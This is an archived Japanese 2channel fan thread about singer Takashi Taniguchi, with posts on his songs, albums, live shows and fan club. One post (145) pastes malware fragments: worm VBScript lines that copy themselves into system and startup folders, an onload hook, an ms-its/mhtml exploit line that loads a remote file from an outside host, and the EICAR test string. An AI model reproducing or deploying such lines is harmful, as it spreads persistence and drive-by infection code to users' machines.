2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

超音波低音ボイス●谷口崇●T.T.

1 :名無しのエリー:2005/05/08(日) 00:41:50 ID:yJQPiSqu
5年半振りニューアルバム『1に戻る』発売中

公式サイト
http://takashitaniguchi.net

2 :名無しのエリー:2005/05/08(日) 00:42:44 ID:yJQPiSqu
低音ってなんだよ…………orz

3 :名無しのエリー:2005/05/08(日) 01:39:43 ID:q4SJ9an7
BAKUの人か

4 :名無しのエリー:2005/05/08(日) 02:28:34 ID:yJQPiSqu
>>3
それは谷口宗一では。

ついでにスレタイ
○高音
×低音

5 :名無しのエリー:2005/05/08(日) 22:06:20 ID:/9n3jn75
不安だ〜スレの未来
不安だ〜これから先

6 :名無しのエリー:2005/05/10(火) 21:32:18 ID:M0Esjrfv
指でさよなら&ティーンズミュージックFES.の人?
’97くらいの高校生クイズの主題歌だった?

7 :名無しのエリー:2005/05/10(火) 23:18:42 ID:JdGGJTK5
>>6
そうそう。まさに'97年の主題歌。
ティーンズミュージックじゃなくてミュージッククエストの方…だと思う。
指でさようならは本当にいい曲だ。

8 :名無しのエリー:2005/05/11(水) 16:33:49 ID:+QQS7eVS
海が乾く前に僕らの愛が乾いてしまった

9 :名無しのエリー:2005/05/11(水) 22:47:11 ID:vY29lzsP
指でさようならなんて少しクールすぎるよ

10 :名無しのエリー:2005/05/11(水) 23:29:25 ID:hCpmpalU
イナミって曲なかった??漏れ当時結構好きだったんだけど。。
人違いだったらスマソ

11 :名無しのエリー:2005/05/11(水) 23:55:08 ID:vY29lzsP
>>10
あったあった。2001年のシングル。
ストリングスの綺麗ないい曲だよね。
君を守りたいはずなのに
どうすればいいのかさえもわからなくて〜♪ての。

でもジャケットは水たまりに立ちションしてるみたいな絵だった……。

12 :名無しのエリー:2005/05/12(木) 00:29:18 ID:sxqQMOmg
苦しくもなく、普通に地声で原曲キー歌えるヤツはいいけど

13 :名無しのエリー:2005/05/12(木) 11:02:33 ID:H+dtXjvl
今度のアルバムの曲は、高音は高音でも
囁きっぽい歌い方になった気がする。
苦々しいみたいに、スコーンと突き抜けた感じの発声がなかったような。
それでも好きな曲ばっかりなんだけど。

14 :名無しのエリー:2005/05/15(日) 18:39:26 ID:WqOvXz1H
歌詞盗作ポエマー
ttp://bbs6.cgiboy.com/sanpoko/

15 :名無しのエリー:2005/05/15(日) 23:40:01 ID:IguPVG0c
ほぼ丸パクリですね。もうそこには出入りしていないみたいだけど。

16 :お知らせです:2005/05/18(水) 07:06:26 ID:qQV6uBig
突然すみません。邦楽の板が新設されたのに伴い、
このスレを移転依頼出します〜

邦楽(男ソロ)(仮)
http://music4.2ch.net/musicjm/

に移動で中身そのままアドレスだけ変わります。新アドレスは↓の予定です。
http://music4.2ch.net/test/read.cgi/musicjm/1115480510/
もし問題がある場合は
http://music4.2ch.net/test/read.cgi/musicj/1099655636/
までお願いします。

17 :名無しさん@お腹いっぱい。:2005/05/19(木) 22:52:11 ID:wHUJI2u0
インディーズ板の方がいいんじゃないの・・・

18 :名無しさん@お腹いっぱい。:2005/05/20(金) 23:54:08 ID:BIZtD0d5
>>17
そうかも知れません。こちらを削除依頼して建て直した方がいいでしょうか。

19 :名無しさん@お腹いっぱい。:2005/05/23(月) 11:42:57 ID:FCMH3LMo
ここが落ちたらでいいんじゃない。

で、アルバムどうなの?

20 :名無しさん@お腹いっぱい。:2005/05/24(火) 21:43:04 ID:TR1gCthN
>>19
ではその方向で。

アルバム、妙に中毒性があっていいですよ。
公式の「Special」で試聴できます。あれは試聴の範囲を超えてるような…
「私じゃない」がエロくて好きです。

21 :名無しさん@お腹いっぱい。:2005/05/31(火) 07:13:41 ID:IDfBfguW
ル〜シ〜♪ってのが好き
1stしか持ってないんだが

22 :名無しさん@お腹いっぱい。:2005/06/02(木) 16:36:46 ID:LUI4CSV4
ルーシー♪とかビクト〜リア♪とかトーマス♪とか、
人名がよく出てくるよね、この人。
それがなんか耳に残って好き。

23 :名無しさん@お腹いっぱい。:2005/06/09(木) 21:07:10 ID:pkmKmI1r
久しぶりに聞いたらやっぱりインパクトのある声だな。

24 :名無しさん@お腹いっぱい。:2005/06/13(月) 00:15:15 ID:e30CtdHi
アルバムバージョン、シングルバージョンなんか言われても区別つかないよ、てな曲の多い中
catch me nowは両バージョンとも本当に楽しかった。

25 :NO MUSIC NO NAME:2005/06/14(火) 13:04:50 ID:qWwWZJsW
昔テープで聞いたことある。
や、いろんな人の当時のヒット入った
オリジナルだったきがするが。(カセットテープってわかる?
何かわからんが
も一度聴きたいね、妙に耳に残る声。

26 :NO MUSIC NO NAME:2005/06/24(金) 02:06:00 ID:whIN5t9h
カセットテープ、懐かしい。
あれはあれで楽しかったな。色々編集したり。
これからライブがいくつかあるけど、行く人いる?

27 :NO MUSIC NO NAME:2005/06/29(水) 21:40:58 ID:0ZdpzHVK
指でさようならが大好きな自分としては
公式の視聴を聴いた限りだと「愛の証明」かなあ。
でも、どれもガツンとこないよね。
凄い短いからこれだけ聴いても分からないけど。

28 :NO MUSIC NO NAME:2005/07/08(金) 20:25:49 ID:f7OxbL5s
昨日ワンマン行ってきた。
久しぶりに楽しそうな谷口を見てうれしかった。

29 :NO MUSIC NO NAME:2005/07/08(金) 22:28:25 ID:CYH59yCR
>>28
いいなー。印象に残った曲は何?

私は京都のライブに行くよ。楽しみだ。

30 :NO MUSIC NO NAME:2005/07/14(木) 11:08:56 ID:CdbAol/K
>>28じゃないけど、ルネサンスマンのアレンジにはしびれた!

で、このスレ一番下にあるわけだけど。
インディーズ板に移動するのかな。このまま行くの?

31 :NO MUSIC NO NAME:2005/07/15(金) 02:55:29 ID:4iupu5d3
落ちるまでこのままいって、その後インディーズ板に移動します。

32 :NO MUSIC NO NAME:2005/07/15(金) 22:11:29 ID:zyiKXBRY
ルサンチマン

33 :NO MUSIC NO NAME:2005/07/15(金) 22:17:17 ID:ZqGtBGYN
ガンガレ〜!谷口崇!

34 :NO MUSIC NO NAME:2005/07/15(金) 22:51:22 ID:4iupu5d3
>>32
ナイスアレンジ

35 :NO MUSIC NO NAME:2005/07/16(土) 10:28:22 ID:Xt+TosyS
結構超え好きだから
このまま密かに応援していくよ

36 :NO MUSIC NO NAME:2005/07/16(土) 14:02:15 ID:bMfaxbB3
>>30
ブルースにアレンジしてたみたいだね。かっこよさそう。
本人も興奮さめやらぬって感じで日記書いてるし、本当に良いライブだったんだな。
GO GO WEST 2005も今から楽しみ。早く八月にならないかなー。

37 :NO MUSIC NO NAME:2005/07/17(日) 01:00:40 ID:QfzcAZkj
http://www.studio-orange.jp/aday/


38 :NO MUSIC NO NAME:2005/07/19(火) 03:33:27 ID:iB5tB3Vo
ホシュ

39 :NO MUSIC NO NAME:2005/07/21(木) 02:00:43 ID:mUqIc0Nd
オープニングアクトって、
そりゃないよ。

40 :NO MUSIC NO NAME:2005/07/21(木) 02:42:38 ID:oAsKstgD
何何、どこで前座?

41 :NO MUSIC NO NAME:2005/07/21(木) 09:06:07 ID:sQjWu+Cf
前座でもなんでもいいじゃん。
とりあえず、人前に出て歌うことがいいと、おもう。

42 :39:2005/07/21(木) 10:41:04 ID:mUqIc0Nd
そうだね。
前向きに考える。

43 :NO MUSIC NO NAME:2005/07/22(金) 23:56:25 ID:ewjIXwvC
>>37 「特別奉納公演」っていう響きが面白いw
日本三景の1つでライブかぁ。天気が良ければ気持ち良さそうだね。

44 :NO MUSIC NO NAME:2005/07/23(土) 00:56:23 ID:0o3Rq87Z
声が印象的だし、こういうライブでもうちょっと知名度が上がるといいな。
指でさようならや苦々しいが廃盤はもったいなさすぎるよ。

45 :NO MUSIC NO NAME:2005/07/26(火) 21:52:47 ID:aAvlLB8b
インストアライブの時、
「ライブ終了後、谷口がサインと握手と感謝をします!」と前説している人がいた。
「サインと握手と感謝」というフレーズが妙にツボにはまった。あれ誰だろ。
あとあの時のSong Of Loveは良かった。

46 :NO MUSIC NO NAME:2005/07/31(日) 08:26:24 ID:Wftybu6Q
ほしゅ

47 :NO MUSIC NO NAME:2005/07/31(日) 23:27:20 ID:QenO6AkH
今度地元(岡山)に谷口がライブにくるらしい。
行こうか迷い中ー

48 :NO MUSIC NO NAME:2005/08/01(月) 20:40:01 ID:+v7dUGKF
>>47
行っちゃえ!

49 :47:2005/08/03(水) 00:01:03 ID:NB2AzP8a
よし、行ってくる!

50 :NO MUSIC NO NAME:2005/08/03(水) 22:29:36 ID:iLcD3uHt
>>49
楽しんできてね

51 :NO MUSIC NO NAME:2005/08/06(土) 05:18:23 ID:5ssWk2Kh
保守

52 :NO MUSIC NO NAME:2005/08/08(月) 05:42:29 ID:Ybmg3CDg
 

53 :NO MUSIC NO NAME:2005/08/10(水) 09:54:26 ID:23On/fv7
谷口崇ファンの年齢層が気になる…
20代後半が多いんでしょうか?

54 :NO MUSIC NO NAME:2005/08/10(水) 14:16:27 ID:n+FjzYtt
>>53
34歳。先頃すすめてファンになった友人は30歳。

55 :NO MUSIC NO NAME:2005/08/10(水) 16:48:20 ID:xtJ3xZha
七夕ライブの時は、30前後が多い印象だったよ。
デビュー当時からずっと応援してるような人が多いのかな。

56 :NO MUSIC NO NAME:2005/08/10(水) 23:43:35 ID:/VM3XYKD
40代だよ、山崎も民生もせっちゃんも大好きだ。
もうすこし、谷口にもブレイクして欲しい。

57 :NO MUSIC NO NAME:2005/08/11(木) 18:30:57 ID:YxFBGd/K
お〜!タニグチスレあったんだね。
うれしくて初カキコ。

ちなみに私は24歳。
指でさようならにリアルタイムでハマりました。
当時高校生だったから初期からのファンの中では若い方ですな。
初期からのファンだと今30〜40歳くらいの人が多そうなカンジです。

あ〜。あの当時はセブンティーンとかにインタビュー載ってたよなぁ
懐かしい…(´・ω・`)

58 :NO MUSIC NO NAME:2005/08/14(日) 02:33:56 ID:5lo2gHDg
>>57
一瞬追い風が吹いてたんだな……

59 :NO MUSIC NO NAME:2005/08/21(日) 12:56:07 ID:BEBK5vQh
くぁwせdrf5tgyふじこp;@「

60 :NO MUSIC NO NAME:2005/08/21(日) 18:08:08 ID:5YDLJUPl
もうすぐゴーゴーニセンゴー!ツアー!!

61 :NO MUSIC NO NAME:2005/08/23(火) 02:00:55 ID:dVh6zMR/
My iPod+iTunesで再生回数トップの曲は「走れ!トーマス」だった。
毎日使ってるわけではないのに、去年の9月に追加して現在54回再生。
週に一回以上聴いている計算になる。
確かに谷口崇を聴くってなるとこの曲を一番最初に聴く。
なんかよくわからんけど大好きな曲だ。

62 :NO MUSIC NO NAME:2005/08/29(月) 13:07:33 ID:KCvQZgK9
ライブ行ってきた。
谷口崇は気持ち良さそうに歌ってて嬉しかった。
指でさようならや苦々しいが聴けて更に嬉しい。

63 :NO MUSIC NO NAME:2005/08/30(火) 23:41:46 ID:hkzxpTfl
sage

64 :NO MUSIC NO NAME:2005/09/03(土) 17:37:36 ID:ylM2mmqf
http://sekisin.hp.infoseek.co.jp

谷口の追っかけが管理人やってますv

65 :NO MUSIC NO NAME:2005/09/06(火) 01:30:29 ID:z09X74cY
>>64
まだ活動してたのかと一瞬思いかけたバンドもあったが、
谷口崇好きに言えた事ではないわな。

66 :NO MUSIC NO NAME:2005/09/06(火) 02:25:10 ID:Sm/7vU4Z
古いビデオ見たら声、顔、動きの衰えをかなり感じた・・・。

当たり前だろ、44歳なんだから。20〜30代と比べてどーすんだ。
古い映像をずっと見てるか、ジャーニー軍団にのりかえな。
俺が望むことは今年中に新曲発売して欲しい。


67 :NO MUSIC NO NAME:2005/09/07(水) 01:39:08 ID:YqpZFDGv
>66 誤爆?

68 :NO MUSIC NO NAME:2005/09/12(月) 12:40:45 ID:AtMNYLlD
ワンマン後なのに書込みないなぁ。
Cover On My heart、生で聞いてみたい…

69 :NO MUSIC NO NAME:2005/09/12(月) 22:58:53 ID:7UJSHHkR
ええっ、谷口って30代前半だと思うけど・・・
間違ってないよね?
保守のためage。

70 :NO MUSIC NO NAME:2005/09/12(月) 23:03:41 ID:YLDQLHPY
>>69
うん。32…だったかな。
>>66は誤爆か、それを装ったコピペでしょう。

71 :NO MUSIC NO NAME:2005/09/14(水) 13:33:16 ID:Bh+SUvk+
11日のGGW3005打ち上げ@徳島行ってきますた。
アコギオンリーだったけどアットホームな感じでよかったよ。
アンコールのときに、偶然客として来ていた藍田君がマンドリンで参加してました。

72 :NO MUSIC NO NAME:2005/09/14(水) 17:58:56 ID:MP7SXSLN
千年先になってるよW
客数どんな感じでした?
Wordとか修学旅行とかの残席を見ると、そんなに客呼べてないのかと心配になる…。

73 :NO MUSIC NO NAME:2005/09/14(水) 23:34:19 ID:Oiy9KnNO
多めに見積もっても30人くらい@京都

74 :71:2005/09/16(金) 04:38:11 ID:2Sv70JOO
2005でしたね。間違えた。
徳島は30〜40人くらいかな?
会場のDYLANが小さなギターバーみたいな感じなんで、
一応超満員。立ち見もいた。

75 :NO MUSIC NO NAME:2005/09/16(金) 20:46:47 ID:6pmgQtXw
今、指でさようなら聞いてるけど、やっぱりいい曲だねこれ。

76 :71:2005/09/19(月) 23:29:19 ID:1KuBXTOw
>73.74
有難う。京都は思ったより少ないかも。

>75
指でさようなら、いいよね。
当時職場の有線で流れてて話題になってた。
「女性?」とも言われてたけど…

77 :NO MUSIC NO NAME:2005/09/24(土) 03:27:03 ID:TUD5LAkf
初めて谷口崇のCDを買って1曲目を聴いたら、
女の人の声に聞こえたもんだから
ジャケットと中身が違ってるのかと思って確認した事がある。
駄目だー苦手だーと聴いていて5曲目の指でさようならでやられちゃったんだよな。

78 :NO MUSIC NO NAME:2005/10/01(土) 13:15:18 ID:ltHAvy4i
京都のコンサートは全日空の早割り21で行った
 

79 :NO MUSIC NO NAME:2005/10/10(月) 16:46:19 ID:/EqTOnx0
BOOK・OFFでbecoming購入した

80 :NO MUSIC NO NAME:2005/10/12(水) 15:53:55 ID:xUAyXRPH
>>79
おめ!

81 :NO MUSIC NO NAME:2005/10/16(日) 21:21:52 ID:Sxkb7NaF
Special thanks CD届いたYo!

82 :NO MUSIC NO NAME:2005/10/17(月) 16:31:54 ID:l6MnLVll
私も来た!これから聞くよ!

83 :NO MUSIC NO NAME:2005/10/17(月) 17:38:22 ID:l6MnLVll
聴いた。ライブ音源が良かった。
上の方で触れられているルネサンスマンのアレンジ本当に格好いい!

84 :NO MUSIC NO NAME:2005/10/19(水) 08:57:58 ID:R9I9u0r/
自分的印象じゃあ、ギターがあんまりうまくない。
ソロで、弾き語りでやるんなら
もう少し・・・ねえ

85 :NO MUSIC NO NAME:2005/10/22(土) 02:17:49 ID:M7r1SvFz
そうだったのか。

86 :NO MUSIC NO NAME:2005/10/26(水) 02:49:01 ID:CbigHr+I


87 :NO MUSIC NO NAME:2005/10/28(金) 01:08:06 ID:pIXUCFxw
亀レスすまん。

>>84
元ブリ○ラの人が「神業!」と言ってるくらいだし、TTのギターは
下手じゃないと思われ。

ただ、アルペジオの曲が多いから、ミスがあると目立つのかもね。

88 :NO MUSIC NO NAME:2005/10/29(土) 19:38:10 ID:ja6WSavv
そうだったのか。

89 :NO MUSIC NO NAME:2005/11/03(木) 21:18:27 ID:EmbDibXR
ファンクラブ入るかどうか迷う。

90 :NO MUSIC NO NAME:2005/11/06(日) 20:30:55 ID:VraxuBHS
age

91 :NO MUSIC NO NAME:2005/11/07(月) 00:10:47 ID:Z5B7nwCA
>>89,
迷うんであれば、とりあえず入ってみれば、
ファンクラブ。

92 :NO MUSIC NO NAME:2005/11/09(水) 22:53:41 ID:gfjexbvw
>>91
そうだよね。退会できないわけじゃないんだし。
今度申し込んでくるよ、ありがとう!

93 :NO MUSIC NO NAME:2005/11/13(日) 15:55:03 ID:KItgO3j8
わたしのおすすめです。
http://www.muzie.co.jp/cgi-bin/artist.cgi?id=a028388

94 :NO MUSIC NO NAME:2005/11/16(水) 01:50:25 ID:DGjx6tSL
ファンクラブはやっぱり生活費に消えるンだろ。子供もできたんだし、そろそろ人生を見つめ直す事も必要。嫁も曲作ってる場合じゃない人様にお金をいただいて生活をしているんだから。

95 :NO MUSIC NO NAME:2005/11/16(水) 10:47:10 ID:DGjx6tSL
生活費ねぇ…それは…もう親になったんだし諦めて働きながら歌うのもありかな。
嫁が曲作ってるって何?

96 :NO MUSIC NO NAME:2005/11/16(水) 21:51:48 ID:Xp3swRug
>>94
人様にお金をもらって生活してるってのは
谷口に限ったことではないと思うが。
人様に…とかそんな事言ってたらサービス業は全部そうじゃん。
それとプロダクションに所属してるんだし
ファンクラブの儲けは直接谷口の儲けにはならないと思う。
谷口もおそらく月給制なんじゃないかな?
ま、オアシスが納得して谷口を雇ってるんだから
>>94のとやかく言うことでもなかろう。
谷口だってバカじゃないんだから
生活に困るほど貰いが少なかったら自分達でどうにかするだろうしね。

97 :NO MUSIC NO NAME:2005/11/21(月) 05:17:59 ID:7M0J4HsY
TTって全国放送のTV出たことあるの?

98 :NO MUSIC NO NAME:2005/11/22(火) 22:06:24 ID:2eeg6jwD
ダウンタウンDXのエンディングテーマになったのってエヴリ・everyだっけ?
あれで画面の端にちっこく出た…ような。

プロモが。

99 :NO MUSIC NO NAME:2005/11/25(金) 11:24:57 ID:vGlgjQbe
TTがテレビに出てたのは見た事あるよ
でも、音楽の話しよりもスタッフに連れてかれたキャバクラの話しをしてた気がする。
ファンクラブの金が〜ってのはやっぱり事務所に行くんだろうから気にならし、更に曲作りを頑張って欲しいと思うけど、嫁のブログを見るたら引いてしまった…
。・゜゜(ノД`)

100 :NO MUSIC NO NAME:2005/11/28(月) 00:18:35 ID:et79qEBc
>>99
発見した。引いた。

101 :NO MUSIC NO NAME:2005/11/28(月) 17:46:36 ID:XA5Ss2uz
>99見たお(;・∀・)
引くっていうか何かね
(_ _,)/


102 :NO MUSIC NO NAME:2005/11/28(月) 18:13:29 ID:VxP8xpD5
嫁blog、
読んでると「いつでも逃げ出せるようにしとかないと」ってな気分になるな。
一人称や句点が安定してない所がハラハラ感5割増。

103 :NO MUSIC NO NAME:2005/12/01(木) 16:47:45 ID:VyuehurX
ハラハラするブログ見つからず漂流中です。最近なんか音楽聞かないんですよね。年とったからか他に興味のあることが出てきたからか…

104 :NO MUSIC NO NAME:2005/12/01(木) 17:25:27 ID:f8EqrSSy
>>103
キーワード置いておきますね。
(ノン OR のん OR non) 谷口崇 (ブログ OR blog) (旦那 OR 嫁)

105 :NO MUSIC NO NAME:2005/12/02(金) 15:42:44 ID:wBcR174O
総合でみんなのうたを歌ってる奴が嫁かと思ったら違った 声の雰囲気は似てた 寒っ…

106 :NO MUSIC NO NAME:2005/12/03(土) 21:44:26 ID:ajjnepSK
嫁スレになってきてるw

107 :NO MUSIC NO NAME:2005/12/06(火) 09:03:15 ID:2aNPGk0H
 

108 :NO MUSIC NO NAME:2005/12/12(月) 22:55:46 ID:DZTvb+Qe
保守

109 :NO MUSIC NO NAME:2005/12/13(火) 15:52:57 ID:UhjquOF2
ぞうきん

110 :NO MUSIC NO NAME:2005/12/16(金) 18:22:45 ID:L6x43WYl
毛虫 Σ(T▽T;)

111 :NO MUSIC NO NAME:2005/12/19(月) 21:47:40 ID:4e+SQ64j
イナミって曲を今日知ったんですけど、いきなりはまってしまいました。

ところでイナミってどういう意味ですか?
どなたか教えて下さい。

112 :NO MUSIC NO NAME:2005/12/20(火) 15:59:06 ID:yK/789fc
イナミ=「波を射る」=射波、の造語じゃなかったかな。
手ごたえのないものに向かって矢を放つイメージだと言っていたような。


113 :NO MUSIC NO NAME:2005/12/20(火) 18:40:32 ID:IDu4gwId
>>112
>>111じゃないけどヘーヘーヘー!
「♪ただまっすぐに願いを込めて」かあ。
いい曲だなあ。
元々好きな曲だったけどもっと好きになった。

114 :111:2005/12/20(火) 19:11:17 ID:UBf0i1Ej
>>112
どうもありがとうございます!

そうだったんですか。
知り合いにたまたまイナミさんって人がいるので
イナミさんって人を想った歌なのかと思っちゃいました。
いやほんと、いい歌ですね。

115 :NO MUSIC NO NAME:2005/12/27(火) 01:25:12 ID:5gux7R9g
短命だと思ってたけど意外と長持ちしてるな、このスレ。

イナミ聴こ。

116 :NO MUSIC NO NAME:2005/12/27(火) 20:02:16 ID:rF55X7cB
TAB!会報キタ━━(゚∀゚)━━!!!
息子可愛ええ〜!
息子をだっこする谷ちゃんもいいかんじ。

117 :89:2005/12/30(金) 23:49:54 ID:CrFRMJ1L
FC申し込むの忘れ続けて早二ヶ月……orz
来年こそ手続きしなければ。

118 :NO MUSIC NO NAME:2006/01/09(月) 06:02:43 ID:te1XqPzW


119 :NO MUSIC NO NAME:2006/01/11(水) 14:16:28 ID:aEXDrZtt


120 :NO MUSIC NO NAME:2006/01/12(木) 22:07:27 ID:ULfBk1un


121 :NO MUSIC NO NAME:2006/01/13(金) 12:34:28 ID:CEpKvoOL


122 :NO MUSIC NO NAME:2006/01/14(土) 21:22:24 ID:t/mGOMSC


123 :NO MUSIC NO NAME:2006/01/15(日) 23:51:06 ID:MIJeXSLW


124 :NO MUSIC NO NAME:2006/01/17(火) 20:21:50 ID:7N0UREyq


125 :NO MUSIC NO NAME:2006/01/21(土) 21:38:33 ID:HCRZO3eM


126 :NO MUSIC NO NAME:2006/01/29(日) 23:14:18 ID:ncDeGP/J


127 :NO MUSIC NO NAME:2006/02/08(水) 17:34:45 ID:n926ZKQS
直弼

128 :NO MUSIC NO NAME:2006/02/16(木) 01:27:41 ID:Z4k43rnC
結果

129 :NO MUSIC NO NAME:2006/02/16(木) 19:14:20 ID:1NnKmIYU
脚気

130 :NO MUSIC NO NAME:2006/02/24(金) 14:15:48 ID:Au/uuStB
あげ

131 :NO MUSIC NO NAME:2006/03/01(水) 02:48:28 ID:tzPFmcdW
hoshu

132 :NO MUSIC NO NAME:2006/03/02(木) 00:57:17 ID:iyqzWHXg
「シンガーズロンリー」の発売日って、まだ決まってないのかな?

133 :NO MUSIC NO NAME:2006/03/03(金) 23:29:56 ID:gbfmRYCv
>>132
決まったみたいだね

134 :NO MUSIC NO NAME:2006/03/14(火) 08:33:09 ID:0Lf9cT6Q
からあげ

135 :sage:2006/03/31(金) 00:10:51 ID:3c1GF0sG
>>102
読んでると「いつでも逃げ出せるようにしとかないと」ってな気分になるな

どのあたり?
あんまり生活苦的なところはナイ感じに思えたんだけど…
消しちゃったのかな?

136 :NO MUSIC NO NAME:2006/03/31(金) 00:12:54 ID:d8gqQyyj
誰?

137 :NO MUSIC NO NAME:2006/04/03(月) 01:23:21 ID:HoYWgDX3
18才♀です。
スペシャでたまたま流れていたルネサンスマンのPVを見て
TTにハマった当時は小4のハナタレでした。
指でさようならとか本当に鳥肌モンでしたよね。
こんなスレがあったなんて感動です。
ライブ行きたいなあ。
独り言チックでスマソorz

138 :NO MUSIC NO NAME:2006/04/07(金) 23:22:12 ID:PriZicfS
保守がわりにメモ

弾き語りミニアルバム「シンガーズロンリー」
4/26発売 1500円
・Cover on my heart
・心に水をやろう
・オールマイティ・ベイビィ
・ハナ
・歌うことで僕は
・ヨランダ

>>137
ようこそ。

139 :NO MUSIC NO NAME:2006/04/16(日) 22:58:51 ID:rUGVmr41
保守あげ!

140 :NO MUSIC NO NAME:2006/04/25(火) 18:47:45 ID:eqfV94Uw
発送完了メール来たage

141 :NO MUSIC NO NAME:2006/05/04(木) 19:55:54 ID:y8t+FO/+
a

142 :NO MUSIC NO NAME:2006/05/06(土) 15:03:59 ID:4BYF+5tF
シンガーズロンリーどう?

143 :NO MUSIC NO NAME:2006/05/09(火) 08:28:12 ID:+9dU2gPa
ハナが良かった。

144 :NO MUSIC NO NAME:2006/06/16(金) 18:05:09 ID:HMk8HycF
浮上

145 :NO MUSIC NO NAME:2006/07/02(日) 20:38:14 ID:BqAPxOMA
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"

146 :NO MUSIC NO NAME:2006/07/16(日) 01:01:39 ID:2aoeltrz
とりあえずがんばれ、谷口
君の声は結構唯一無二だと思うんだけれどね。

147 :NO MUSIC NO NAME:2006/08/03(木) 09:41:49 ID:Wg0MhnNF
浮上

148 :NO MUSIC NO NAME:2006/09/16(土) 22:31:37 ID:Msyst/mj
もしっこの青い星が

149 :NO MUSIC NO NAME:2006/09/19(火) 02:44:02 ID:cOEVlnA3
終わるというのなら

150 :NO MUSIC NO NAME:2006/09/29(金) 22:46:40 ID:ofpVZYr2
僕は彼を連れて

151 :NO MUSIC NO NAME:2006/10/08(日) 09:27:02 ID:pewU3Mt3
>>150
アッー!

152 :NO MUSIC NO NAME:2006/11/08(水) 20:20:16 ID:2I2SBMvA
一ヶ月経過

153 :NO MUSIC NO NAME:2006/11/16(木) 16:49:24 ID:CnRDl2Yq
ほしゅ

154 :NO MUSIC NO NAME:2006/12/08(金) 01:02:04 ID:pwgBD+eW
 

155 :NO MUSIC NO NAME:2006/12/25(月) 21:38:01 ID:2cvO5U0J
今、ラッシーって映画の宣伝でTTの曲が流れてたぞ!がんがれTT!

156 :NO MUSIC NO NAME:2006/12/26(火) 22:09:36 ID:6M6Ky0h9
>>155
CM見た事ないからラッシーの公式サイト行ってみた。
エンディングテーマ曲岸谷香って書いてあるんだけど、それとは別?

157 :NO MUSIC NO NAME:2007/01/04(木) 08:52:58 ID:Vn37nVFi
なんだ
公式サイトもょめブログも止まってるじゃんどうしたんだよ
もう辞めちゃうの?(´・ω・`)

158 :NO MUSIC NO NAME:2007/01/04(木) 16:23:20 ID:g6sLJkVA
>>157
年賀状きたぉ
「renewal open soon!」
だって!

159 :NO MUSIC NO NAME:2007/01/18(木) 23:41:58 ID:V5VrHgwI
指でさようならをラジオで聞いてて
最近になってまた聞きたくなってCDショップ探してみつからなくて
検索掛けてスレ見つけて安心した よかった まだやってる

160 :NO MUSIC NO NAME:2007/02/13(火) 23:19:29 ID:eKMyx30o
早速指でさようならが入ったアルバムを落札してみたんだが歌詞がわからん

どっかにのってないかなぁ?

26 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)